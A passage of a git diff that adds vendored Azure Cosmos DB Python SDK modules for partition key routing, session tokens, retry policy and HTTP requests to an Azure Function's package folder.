CollectionRoutingMap.MinimumInclusiveEffectivePartitionKey + ) + isComplete &= ( + lastRange[PartitionKeyRange.MaxExclusive] == CollectionRoutingMap.MaximumExclusiveEffectivePartitionKey + ) + + for i in range(1, len(ordered_partition_key_range_list)): + previousRange = ordered_partition_key_range_list[i - 1] + currentRange = ordered_partition_key_range_list[i] + isComplete &= ( + previousRange[PartitionKeyRange.MaxExclusive] == currentRange[PartitionKeyRange.MinInclusive] + ) + + if not isComplete: + if previousRange[PartitionKeyRange.MaxExclusive] > currentRange[PartitionKeyRange.MinInclusive]: + raise ValueError("Ranges overlap") + break + + return isComplete diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_map_provider.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_map_provider.py new file mode 100644 index 0000000..6193ae2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_map_provider.py @@ -0,0 +1,194 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for partition key range cache implementation in the Azure +Cosmos database service. +""" + +from .. import _base +from .collection_routing_map import CollectionRoutingMap +from . import routing_range +from .routing_range import PartitionKeyRange + +# pylint: disable=protected-access + + +class PartitionKeyRangeCache(object): + """ + PartitionKeyRangeCache provides list of effective partition key ranges for a + collection. + + This implementation loads and caches the collection routing map per + collection on demand. + """ + + def __init__(self, client): + """ + Constructor + """ + + self._documentClient = client + + # keeps the cached collection routing map by collection id + self._collection_routing_map_by_item = {} + + def get_overlapping_ranges(self, collection_link, partition_key_ranges): + """Given a partition key range and a collection, return the list of + overlapping partition key ranges. + + :param str collection_link: The name of the collection. + :param list partition_key_ranges: List of partition key range. + :return: List of overlapping partition key ranges. + :rtype: list + """ + cl = self._documentClient + + collection_id = _base.GetResourceIdOrFullNameFromLink(collection_link) + + collection_routing_map = self._collection_routing_map_by_item.get(collection_id) + if collection_routing_map is None: + collection_pk_ranges = list(cl._ReadPartitionKeyRanges(collection_link)) + # for large collections, a split may complete between the read partition key ranges query page responses, + # causing the partitionKeyRanges to have both the children ranges and their parents. Therefore, we need + # to discard the parent ranges to have a valid routing map. + collection_pk_ranges = PartitionKeyRangeCache._discard_parent_ranges(collection_pk_ranges) + collection_routing_map = CollectionRoutingMap.CompleteRoutingMap( + [(r, True) for r in collection_pk_ranges], collection_id + ) + self._collection_routing_map_by_item[collection_id] = collection_routing_map + return collection_routing_map.get_overlapping_ranges(partition_key_ranges) + + @staticmethod + def _discard_parent_ranges(partitionKeyRanges): + parentIds = set() + for r in partitionKeyRanges: + if isinstance(r, dict) and PartitionKeyRange.Parents in r: + for parentId in r[PartitionKeyRange.Parents]: + parentIds.add(parentId) + return (r for r in partitionKeyRanges if r[PartitionKeyRange.Id] not in parentIds) + + +def _second_range_is_after_first_range(range1, range2): + if range1.max > range2.min: + ##r.min < #previous_r.max + return False + + if range2.min == range1.max and range1.isMaxInclusive and range2.isMinInclusive: + # the inclusive ending endpoint of previous_r is the same as the inclusive beginning endpoint of r + return False + + return True + + +def _is_sorted_and_non_overlapping(ranges): + for idx, r in list(enumerate(ranges))[1:]: + previous_r = ranges[idx - 1] + if not _second_range_is_after_first_range(previous_r, r): + return False + return True + + +def _subtract_range(r, partition_key_range): + """Evaluates and returns r - partition_key_range + + :param dict partition_key_range: Partition key range. + :param routing_range.Range r: query range. + :return: The subtract r - partition_key_range. + :rtype: routing_range.Range + """ + + left = max(partition_key_range[routing_range.PartitionKeyRange.MaxExclusive], r.min) + + if left == r.min: + leftInclusive = r.isMinInclusive + else: + leftInclusive = False + + queryRange = routing_range.Range(left, r.max, leftInclusive, r.isMaxInclusive) + return queryRange + + +class SmartRoutingMapProvider(PartitionKeyRangeCache): + """ + Efficiently uses PartitionKeyRangeCach and minimizes the unnecessary + invocation of CollectionRoutingMap.get_overlapping_ranges() + """ + + def get_overlapping_ranges(self, collection_link, partition_key_ranges): + """ + Given the sorted ranges and a collection, + Returns the list of overlapping partition key ranges + + :param str collection_link: The collection link. + :param (list of routing_range.Range) partition_key_ranges: + The sorted list of non-overlapping ranges. + :return: List of partition key ranges. + :rtype: list of dict + :raises ValueError: + If two ranges in partition_key_ranges overlap or if the list is not sorted + """ + + # validate if the list is non-overlapping and sorted + if not _is_sorted_and_non_overlapping(partition_key_ranges): + raise ValueError("the list of ranges is not a non-overlapping sorted ranges") + + target_partition_key_ranges = [] + + it = iter(partition_key_ranges) + try: + currentProvidedRange = next(it) + while True: + if currentProvidedRange.isEmpty(): + # skip and go to the next item\ + currentProvidedRange = next(it) + continue + + if target_partition_key_ranges: + queryRange = _subtract_range(currentProvidedRange, target_partition_key_ranges[-1]) + else: + queryRange = currentProvidedRange + + overlappingRanges = PartitionKeyRangeCache.get_overlapping_ranges(self, collection_link, queryRange) + assert overlappingRanges, "code bug: returned overlapping ranges for queryRange {} is empty".format( + queryRange + ) + target_partition_key_ranges.extend(overlappingRanges) + + lastKnownTargetRange = routing_range.Range.PartitionKeyRangeToRange(target_partition_key_ranges[-1]) + + # the overlapping ranges must contain the requested range + assert ( + currentProvidedRange.max <= lastKnownTargetRange.max + ), "code bug: returned overlapping ranges {} does not contain the requested range {}".format( + overlappingRanges, queryRange + ) + + # the current range is contained in target_partition_key_ranges just move forward + currentProvidedRange = next(it) + + while currentProvidedRange.max <= lastKnownTargetRange.max: + # the current range is covered too. just move forward + currentProvidedRange = next(it) + except StopIteration: + # when the iteration is exhausted we get here. There is nothing else to be done + pass + + return target_partition_key_ranges diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_range.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_range.py new file mode 100644 index 0000000..cb7ced3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_routing/routing_range.py @@ -0,0 +1,133 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for partition key range implementation in the Azure Cosmos +database service. +""" + + +class PartitionKeyRange(object): + """Partition Key Range Constants""" + + MinInclusive = "minInclusive" + MaxExclusive = "maxExclusive" + Id = "id" + Parents = "parents" + + +class Range(object): + """description of class""" + + MinPath = "min" + MaxPath = "max" + IsMinInclusivePath = "isMinInclusive" + IsMaxInclusivePath = "isMaxInclusive" + + def __init__(self, range_min, range_max, isMinInclusive, isMaxInclusive): + if range_min is None: + raise ValueError("min is missing") + if range_max is None: + raise ValueError("max is missing") + + self.min = range_min + self.max = range_max + self.isMinInclusive = isMinInclusive + self.isMaxInclusive = isMaxInclusive + + def contains(self, value): + minToValueRelation = self.min > value + maxToValueRelation = self.max > value + return ( + (self.isMinInclusive and minToValueRelation <= 0) or (not self.isMinInclusive and minToValueRelation < 0) + ) and ( + (self.isMaxInclusive and maxToValueRelation >= 0) or (not self.isMaxInclusive and maxToValueRelation > 0) + ) + + @classmethod + def PartitionKeyRangeToRange(cls, partition_key_range): + self = cls( + partition_key_range[PartitionKeyRange.MinInclusive], + partition_key_range[PartitionKeyRange.MaxExclusive], + True, + False, + ) + return self + + @classmethod + def ParseFromDict(cls, range_as_dict): + self = cls( + range_as_dict[Range.MinPath], + range_as_dict[Range.MaxPath], + range_as_dict[Range.IsMinInclusivePath], + range_as_dict[Range.IsMaxInclusivePath], + ) + return self + + def isSingleValue(self): + return self.isMinInclusive and self.isMaxInclusive and self.min == self.max + + def isEmpty(self): + return (not (self.isMinInclusive and self.isMaxInclusive)) and self.min == self.max + + def __hash__(self): + return hash((self.min, self.max, self.isMinInclusive, self.isMaxInclusive)) + + def __str__(self): + + return ( + ("[" if self.isMinInclusive else "(") + + str(self.min) + + "," + + str(self.max) + + ("]" if self.isMaxInclusive else ")") + ) + + def __eq__(self, other): + return ( + (self.min == other.min) + and (self.max == other.max) + and (self.isMinInclusive == other.isMinInclusive) + and (self.isMaxInclusive == other.isMaxInclusive) + ) + + @staticmethod + def _compare_helper(a, b): + # python 3 compatible + return (a > b) - (a < b) + + @staticmethod + def overlaps(range1, range2): + + if range1 is None or range2 is None: + return False + if range1.isEmpty() or range2.isEmpty(): + return False + + cmp1 = Range._compare_helper(range1.min, range2.max) + cmp2 = Range._compare_helper(range2.min, range1.max) + + if cmp1 <= 0 or cmp2 <= 0: + if (cmp1 == 0 and not (range1.isMinInclusive and range2.isMaxInclusive)) or ( + cmp2 == 0 and not (range2.isMinInclusive and range1.isMaxInclusive) + ): + return False + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_runtime_constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_runtime_constants.py new file mode 100644 index 0000000..7979647 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_runtime_constants.py @@ -0,0 +1,43 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Runtime Constants in the Azure Cosmos database service. +""" + + +class MediaTypes(object): + """Constants of media types. + + See http://www.iana.org/assignments/media-types/media-types.xhtml for + more information. + """ + + Any = "*/*" + ImageJpeg = "image/jpeg" + ImagePng = "image/png" + JavaScript = "application/x-javascript" + Json = "application/json" + OctetStream = "application/octet-stream" + QueryJson = "application/query+json" + SQL = "application/sql" + TextHtml = "text/html" + TextPlain = "text/plain" + Xml = "application/xml" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session.py new file mode 100644 index 0000000..90092ff --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session.py @@ -0,0 +1,216 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Session Consistency Tracking in the Azure Cosmos database service. +""" + +import sys +import traceback +import threading + +from . import _base +from . import http_constants +from ._vector_session_token import VectorSessionToken +from .exceptions import CosmosHttpResponseError + + +class SessionContainer(object): + def __init__(self): + self.collection_name_to_rid = {} + self.rid_to_session_token = {} + self.session_lock = threading.RLock() + + def get_session_token(self, resource_path): + """Get Session Token for collection_link. + + :param str resource_path: Self link / path to the resource + :return: Session Token dictionary for the collection_id + :rtype: dict + """ + + with self.session_lock: + is_name_based = _base.IsNameBased(resource_path) + collection_rid = "" + session_token = "" + + try: + if is_name_based: + # get the collection name + collection_name = _base.GetItemContainerLink(resource_path) + collection_rid = self.collection_name_to_rid[collection_name] + else: + collection_rid = _base.GetItemContainerLink(resource_path) + + if collection_rid in self.rid_to_session_token: + token_dict = self.rid_to_session_token[collection_rid] + session_token_list = [] + for key in token_dict.keys(): + session_token_list.append("{0}:{1}".format(key, token_dict[key].convert_to_string())) + session_token = ",".join(session_token_list) + return session_token + + # return empty token if not found + return "" + except Exception: # pylint: disable=broad-except + return "" + + def set_session_token(self, response_result, response_headers): + """Session token must only be updated from response of requests that + successfully mutate resource on the server side (write, replace, delete etc). + + :param dict response_result: + :param dict response_headers: + :return: None + """ + + # there are two pieces of information that we need to update session token- + # self link which has the rid representation of the resource, and + # x-ms-alt-content-path which is the string representation of the resource + + with self.session_lock: + collection_rid = "" + collection_name = "" + + try: + self_link = response_result["_self"] + + # extract alternate content path from the response_headers + # (only document level resource updates will have this), + # and if not present, then we can assume that we don't have to update + # session token for this request + alt_content_path = "" + alt_content_path_key = http_constants.HttpHeaders.AlternateContentPath + response_result_id_key = u"id" + response_result_id = None + if alt_content_path_key in response_headers: + alt_content_path = response_headers[http_constants.HttpHeaders.AlternateContentPath] + response_result_id = response_result[response_result_id_key] + else: + return + collection_rid, collection_name = _base.GetItemContainerInfo( + self_link, alt_content_path, response_result_id + ) + + except ValueError: + return + except Exception: # pylint: disable=broad-except + exc_type, exc_value, exc_traceback = sys.exc_info() + traceback.print_exception(exc_type, exc_value, exc_traceback, limit=2, file=sys.stdout) + return + + if collection_name in self.collection_name_to_rid: + # check if the rid for the collection name has changed + # this means that potentially, the collection was deleted + # and recreated + existing_rid = self.collection_name_to_rid[collection_name] + if collection_rid != existing_rid: + # flush the session tokens for the old rid, and + # update the new rid into the collection name to rid map. + self.rid_to_session_token[existing_rid] = {} + self.collection_name_to_rid[collection_name] = collection_rid + + # parse session token + parsed_tokens = self.parse_session_token(response_headers) + + # update session token in collection rid to session token map + if collection_rid in self.rid_to_session_token: + # we need to update the session tokens for 'this' collection + for id_ in parsed_tokens: + old_session_token = ( + self.rid_to_session_token[collection_rid][id_] + if id_ in self.rid_to_session_token[collection_rid] + else None + ) + if not old_session_token: + self.rid_to_session_token[collection_rid][id_] = parsed_tokens[id_] + else: + self.rid_to_session_token[collection_rid][id_] = parsed_tokens[id_].merge(old_session_token) + self.collection_name_to_rid[collection_name] = collection_rid + else: + self.rid_to_session_token[collection_rid] = parsed_tokens + self.collection_name_to_rid[collection_name] = collection_rid + + def clear_session_token(self, response_headers): + with self.session_lock: + collection_rid = "" + alt_content_path = "" + alt_content_path_key = http_constants.HttpHeaders.AlternateContentPath + if alt_content_path_key in response_headers: + alt_content_path = response_headers[http_constants.HttpHeaders.AlternateContentPath] + if alt_content_path in self.collection_name_to_rid: + collection_rid = self.collection_name_to_rid[alt_content_path] + del self.collection_name_to_rid[alt_content_path] + del self.rid_to_session_token[collection_rid] + + @staticmethod + def parse_session_token(response_headers): + """Extracts session token from response headers and parses. + + :param dict response_headers: + :return: A dictionary of partition id to session lsn for given collection + :rtype: dict + """ + + # extract session token from response header + session_token = "" + if http_constants.HttpHeaders.SessionToken in response_headers: + session_token = response_headers[http_constants.HttpHeaders.SessionToken] + + id_to_sessionlsn = {} + if session_token: + # extract id, lsn from the token. For p-collection, + # the token will be a concatenation of pairs for each collection + token_pairs = session_token.split(",") + for token_pair in token_pairs: + tokens = token_pair.split(":") + if len(tokens) == 2: + id_ = tokens[0] + sessionToken = VectorSessionToken.create(tokens[1]) + if sessionToken is None: + raise CosmosHttpResponseError( + status_code=http_constants.StatusCodes.INTERNAL_SERVER_ERROR, + message="Could not parse the received session token: %s" % tokens[1], + ) + id_to_sessionlsn[id_] = sessionToken + return id_to_sessionlsn + + +class Session(object): + """State of a Azure Cosmos session. + + This session object can be shared across clients within the same process. + + :param url_connection: + """ + + def __init__(self, url_connection): + self.url_connection = url_connection + self.session_container = SessionContainer() + # include creation time, and some other stats + + def clear_session_token(self, response_headers): + self.session_container.clear_session_token(response_headers) + + def update_session(self, response_result, response_headers): + self.session_container.set_session_token(response_result, response_headers) + + def get_session_token(self, resource_path): + return self.session_container.get_session_token(resource_path) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session_retry_policy.py new file mode 100644 index 0000000..bf6e4de --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_session_retry_policy.py @@ -0,0 +1,115 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for session read/write unavailable retry policy implementation +in the Azure Cosmos database service. +""" + +import logging +from azure.cosmos.documents import _OperationType + +logger = logging.getLogger(__name__) +logger.setLevel(logging.INFO) +log_formatter = logging.Formatter("%(levelname)s:%(message)s") +log_handler = logging.StreamHandler() +log_handler.setFormatter(log_formatter) +logger.addHandler(log_handler) + + +class _SessionRetryPolicy(object): + """The session retry policy used to handle read/write session unavailability. + """ + + Max_retry_attempt_count = 1 + Retry_after_in_milliseconds = 0 + + def __init__(self, endpoint_discovery_enable, global_endpoint_manager, *args): + self.global_endpoint_manager = global_endpoint_manager + self._max_retry_attempt_count = _SessionRetryPolicy.Max_retry_attempt_count + self.session_token_retry_count = 0 + self.retry_after_in_milliseconds = _SessionRetryPolicy.Retry_after_in_milliseconds + self.endpoint_discovery_enable = endpoint_discovery_enable + self.request = args[0] if args else None + if self.request: + self.can_use_multiple_write_locations = self.global_endpoint_manager.can_use_multiple_write_locations( + self.request + ) + # clear previous location-based routing directive + self.request.clear_route_to_location() + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + + def ShouldRetry(self, _exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + """ + self.session_token_retry_count += 1 + # clear previous location-based routing directive + self.request.clear_route_to_location() + + if not self.endpoint_discovery_enable: + # if endpoint discovery is disabled, the request cannot be retried anywhere else + return False + + if self.can_use_multiple_write_locations: + if _OperationType.IsReadOnlyOperation(self.request.operation_type): + endpoints = self.global_endpoint_manager.get_ordered_read_endpoints() + else: + endpoints = self.global_endpoint_manager.get_ordered_write_endpoints() + + if self.session_token_retry_count > len(endpoints): + # When use multiple write locations is true and the request has been tried + # on all locations, then don't retry the request + return False + + # set location-based routing directive based on request retry context + self.request.route_to_location_with_preferred_location_flag( + self.session_token_retry_count - 1, self.session_token_retry_count > self._max_retry_attempt_count + ) + self.request.should_clear_session_token_on_session_read_failure = self.session_token_retry_count == len( + endpoints + ) # clear on last attempt + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + return True + + if self.session_token_retry_count > self._max_retry_attempt_count: + # When cannot use multiple write locations, then don't retry the request if + # we have already tried this request on the write location + return False + + # set location-based routing directive based on request retry context + self.request.route_to_location_with_preferred_location_flag(self.session_token_retry_count - 1, False) + self.request.should_clear_session_token_on_session_read_failure = True + + # Resolve the endpoint for the request and pin the resolution to the resolved endpoint + # This enables marking the endpoint unavailability on endpoint failover/unreachability + self.location_endpoint = self.global_endpoint_manager.resolve_service_endpoint(self.request) + self.request.route_to_location(self.location_endpoint) + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_synchronized_request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_synchronized_request.py new file mode 100644 index 0000000..96ff68f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_synchronized_request.py @@ -0,0 +1,215 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Synchronized request in the Azure Cosmos database service. +""" + +import json +import time + +from urllib.parse import urlparse +from azure.core.exceptions import DecodeError # type: ignore + +from . import exceptions +from . import http_constants +from . import _retry_utility + + +def _is_readable_stream(obj): + """Checks whether obj is a file-like readable stream. + + :rtype: boolean + """ + if hasattr(obj, "read") and callable(getattr(obj, "read")): + return True + return False + + +def _request_body_from_data(data): + """Gets request body from data. + + When `data` is dict and list into unicode string; otherwise return `data` + without making any change. + + :param (str, unicode, file-like stream object, dict, list or None) data: + + :rtype: + str, unicode, file-like stream object, or None + + """ + if data is None or isinstance(data, str) or _is_readable_stream(data): + return data + if isinstance(data, (dict, list, tuple)): + + json_dumped = json.dumps(data, separators=(",", ":")) + + return json_dumped + return None + + +def _Request(global_endpoint_manager, request_params, connection_policy, pipeline_client, request, **kwargs): + """Makes one http request using the requests module. + + :param _GlobalEndpointManager global_endpoint_manager: + :param dict request_params: + contains the resourceType, operationType, endpointOverride, + useWriteEndpoint, useAlternateWriteEndpoint information + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: + Pipeline client to process the request + :param azure.core.HttpRequest request: + The request object to send through the pipeline + :return: tuple of (result, headers) + :rtype: tuple of (dict, dict) + + """ + # pylint: disable=protected-access + + connection_timeout = connection_policy.RequestTimeout + connection_timeout = kwargs.pop("connection_timeout", connection_timeout / 1000.0) + + # Every request tries to perform a refresh + client_timeout = kwargs.get('timeout') + start_time = time.time() + global_endpoint_manager.refresh_endpoint_list(None, **kwargs) + if client_timeout is not None: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + if request_params.endpoint_override: + base_url = request_params.endpoint_override + else: + base_url = global_endpoint_manager.resolve_service_endpoint(request_params) + if base_url != pipeline_client._base_url: + request.url = request.url.replace(pipeline_client._base_url, base_url) + + parse_result = urlparse(request.url) + + # The requests library now expects header values to be strings only starting 2.11, + # and will raise an error on validation if they are not, so casting all header values to strings. + request.headers.update({header: str(value) for header, value in request.headers.items()}) + + # We are disabling the SSL verification for local emulator(localhost/127.0.0.1) or if the user + # has explicitly specified to disable SSL verification. + is_ssl_enabled = ( + parse_result.hostname != "localhost" + and parse_result.hostname != "127.0.0.1" + and not connection_policy.DisableSSLVerification + ) + + if connection_policy.SSLConfiguration or "connection_cert" in kwargs: + ca_certs = connection_policy.SSLConfiguration.SSLCaCerts + cert_files = (connection_policy.SSLConfiguration.SSLCertFile, connection_policy.SSLConfiguration.SSLKeyFile) + response = _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + connection_verify=kwargs.pop("connection_verify", ca_certs), + connection_cert=kwargs.pop("connection_cert", cert_files), + **kwargs + ) + else: + response = _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + # If SSL is disabled, verify = false + connection_verify=kwargs.pop("connection_verify", is_ssl_enabled), + **kwargs + ) + + response = response.http_response + headers = dict(response.headers) + + data = response.body() + if data: + data = data.decode("utf-8") + + if response.status_code == 404: + raise exceptions.CosmosResourceNotFoundError(message=data, response=response) + if response.status_code == 409: + raise exceptions.CosmosResourceExistsError(message=data, response=response) + if response.status_code == 412: + raise exceptions.CosmosAccessConditionFailedError(message=data, response=response) + if response.status_code >= 400: + raise exceptions.CosmosHttpResponseError(message=data, response=response) + + result = None + if data: + try: + result = json.loads(data) + except Exception as e: + raise DecodeError( + message="Failed to decode JSON data: {}".format(e), + response=response, + error=e) + + return result, headers + + +def _PipelineRunFunction(pipeline_client, request, **kwargs): + # pylint: disable=protected-access + + return pipeline_client._pipeline.run(request, **kwargs) + +def SynchronizedRequest( + client, + request_params, + global_endpoint_manager, + connection_policy, + pipeline_client, + request, + request_data, + **kwargs +): + """Performs one synchronized http request according to the parameters. + + :param object client: Document client instance + :param dict request_params: + :param _GlobalEndpointManager global_endpoint_manager: + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: PipelineClient to process the request. + :param str method: + :param str path: + :param (str, unicode, file-like stream object, dict, list or None) request_data: + :param dict query_params: + :param dict headers: + :return: tuple of (result, headers) + :rtype: tuple of (dict dict) + """ + request.data = _request_body_from_data(request_data) + if request.data and isinstance(request.data, str): + request.headers[http_constants.HttpHeaders.ContentLength] = len(request.data) + elif request.data is None: + request.headers[http_constants.HttpHeaders.ContentLength] = 0 + + # Pass _Request function with it's parameters to retry_utility's Execute method that wraps the call with retries + return _retry_utility.Execute( + client, + global_endpoint_manager, + _Request, + request_params, + connection_policy, + pipeline_client, + request, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_utils.py new file mode 100644 index 0000000..ee80a96 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_utils.py @@ -0,0 +1,51 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, 